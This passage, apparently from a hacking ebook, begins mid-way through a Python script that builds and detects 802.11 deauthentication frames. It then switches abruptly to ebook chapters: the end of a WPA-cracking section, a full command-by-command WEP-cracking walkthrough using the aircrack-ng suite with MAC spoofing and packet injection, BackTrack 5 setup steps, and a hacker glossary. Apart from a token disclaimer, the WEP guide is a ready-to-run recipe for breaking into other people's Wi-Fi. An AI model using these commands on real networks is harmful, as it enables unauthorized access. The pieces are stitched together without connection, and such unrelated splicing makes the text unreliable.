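    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt_frame(frame: bytes):
    """Return (subtype, addr1, addr2, addr3) for a management frame, else None."""
    if len(frame) < 24:          # shorter than a full 802.11 MAC header
        return None
    fc = frame[0]                # bits 2-3: frame type, bits 4-7: subtype
    if (fc >> 2) & 0x3 != MGMT_TYPE:
        return None
    subtype = (fc >> 4) & 0xF
    return subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])

def deauth_frame(dst: bytes, src: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Build a deauthentication frame for the constructed capture."""
    fc = bytes([(DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2), 0x00])
    duration, seq_ctrl = b"\x3a\x01", b"\x00\x00"
    return fc + duration + dst + src + bssid + seq_ctrl + reason.to_bytes(2, "little")

def flag_deauth_bursts(frames, threshold: int = 5) -> dict:
    """Count deauth frames per transmitter (addr2); return those at/over threshold."""
    counts = Counter()
    for f in frames:
        parsed = parse_mgmt_frame(f)
        if parsed and parsed[0] == DEAUTH_SUBTYPE:
            counts[parsed[2]] += 1
    return {src: n for src, n in counts.items() if n >= threshold}

def sample_capture():
    """Constructed capture: two beacons, one client leaving normally, then a
    burst of eight broadcast deauths spoofed from the AP's address."""
    beacon = bytes([0x80, 0x00]) + b"\x00\x00" + BROADCAST + AP + AP + b"\x00\x00"
    frames = [beacon, beacon, deauth_frame(AP, STA, AP, reason=3)]
    frames += [deauth_frame(BROADCAST, AP, AP) for _ in range(8)]
    return frames
```

A single client disconnecting normally stays under the threshold, while the spoofed burst is reported against the AP address it impersonates, so the alert points at the BSSID under attack.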
NOTES:

This won't work if you don't get a WPA handshake. The command terminal will let you know if you've received the WPA handshake or not.

Hacking WPA isn't 100% going to work every time. It will only work if their WPA password is in the dictionary file you're using. The bigger the dictionary file, the better your chances, but the longer it will take.

It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.


Crack wap wi-fi

This chapter will teach you how to crack the WEP of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similarly in newer versions. BackTrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.

What you will need:

Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=68b8d15896f4851257a33e8133350dd7#which_is_the_best_card_to_buy)
Optional: Flash drive or blank DVD
Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within Windows, or you can boot BackTrack straight off of a DVD or flash drive. Instructions for each of these methods are on the BackTrack website.
Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
type in: airmon-ng
Look for the name of your wireless card; it's different for a lot of computers. Mine is wlan0, so for the rest of this guide that's what I'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
type: airmon-ng stop wlan0
type: macchanger --mac 00:11:22:33:44:55 wlan0
type: airmon-ng start wlan0
type: airodump-ng wlan0
You will now see all of the wifi networks in range. Once you've found the one you want to hack, press Ctrl + C to stop scanning. Take note of the BSSID and channel of the network you want to hack.
type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0
Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0
type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0
Now go back to the 1st window; you'll notice a number steadily increasing. Once it's over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the number is even higher, try again at 15,000, and so on.
Open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap
You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When it's found the key, it will appear on the screen. You can now log into that network using the WEP key on the screen :)
NOTES:

Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take a while for you to get enough packets to crack the WEP.

It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.


Setup back track 5

This guide will show you how to download and set up BackTrack 5 to either boot off of USB, DVD, or dual-boot. BackTrack 5 is a Linux build filled with a bunch of useful penetration testing tools, and will be used in the WiFi hacking tutorials as well as the hacking PC tutorials.

USB method
Using just a USB drive, you can run BackTrack on any computer without installing anything.

What you need:

4GB+ USB flash drive
Windows PC
BackTrack 5 ISO file
UNetbootin
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Download UNetbootin from http://unetbootin.sourceforge.net/ for Windows and install it.
Plug your USB drive into your PC.
Format the USB drive to FAT32. Note: this will delete all files on the flash drive.
Open UNetbootin and choose diskimage
Select the BackTrack 5 ISO file you downloaded.
Set the amount of space you would like to use for persistence in MB
Select your USB drive to create a bootable BackTrack 5
Now when you plug your flash drive into any computer and turn it on, you can boot off the flash drive. If it doesn't do this automatically, open the computer's boot options at start up. Usually you can access this screen by pressing the Esc key while it's booting up. Select your USB drive and BackTrack 5 will now boot up. When it asks you to log in, the username/password is root // toor.
DVD method
Using just a DVD, you can run BackTrack on any computer with a DVD drive without installing anything.

What you need:

Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack 5 ISO to DVD. It's recommended you choose the slowest burning speed.
Now when you insert your DVD into any computer and turn it on, you can boot off the disc. If it doesn't do this automatically, open the computer's boot options at start up. Usually you can access this screen by pressing the Esc key while it's booting up. Select your DVD drive and BackTrack 5 will now boot up. When it asks you to log in, the username/password is root // toor.

Dual-boot method
Set up BackTrack 5 to dual boot alongside your Windows 7 installation. When you boot up your computer, you'll be able to choose whether you want to boot into Windows 7 or boot into BackTrack 5.

What you need:

Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack 5 ISO to DVD. It's recommended you choose the slowest burning speed.
With the DVD in your drive, reboot and boot off the disc. If it doesn't do this automatically, open the computer's boot options at start up. Usually you can access this screen by pressing the Esc key while it's booting up. Select your DVD drive and BackTrack 5 will now boot up. When it asks you to log in, the username/password is root // toor.
Once you're at the BackTrack 5 desktop, you will see an install file on the desktop. Run this and follow the steps until installation is completed. It will ask you for your language, time zone, and how much of your hard drive you'd like to use for BackTrack.
Reboot, and you will now have the option to boot into Windows 7 or BackTrack 5.


Hacker's Dictionary

ACRONYMS
R.A.T.=Remote Administration Tool
DrDoS=Distributed Reflected Denial of Service. An attack that uses a list of reflection servers or other methods such as DNS to spoof an attack so it looks like it's coming from multiple IPs. Amplification of the attack's power can occur.
VPS=Virtual Private Server.
SE=Social Engineering.
HTTP=hyper text transfer protocol.
SSH=Secure Shell, used to connect to a virtual private server.
FTP=File Transfer Protocol. Used to transfer files over an FTP server.
XSS(CSS)=cross site scripting.
Malware=Malicious Software.
Skid=Script Kiddie.
DDoS=Distributed Denial of Service.
VPN=Virtual Private Network.
Nix=Unix-based OS.
SQL=Structured Query Language. It usually goes along with a word after it, such as "SQL Injection".
FUD=fully undetectable.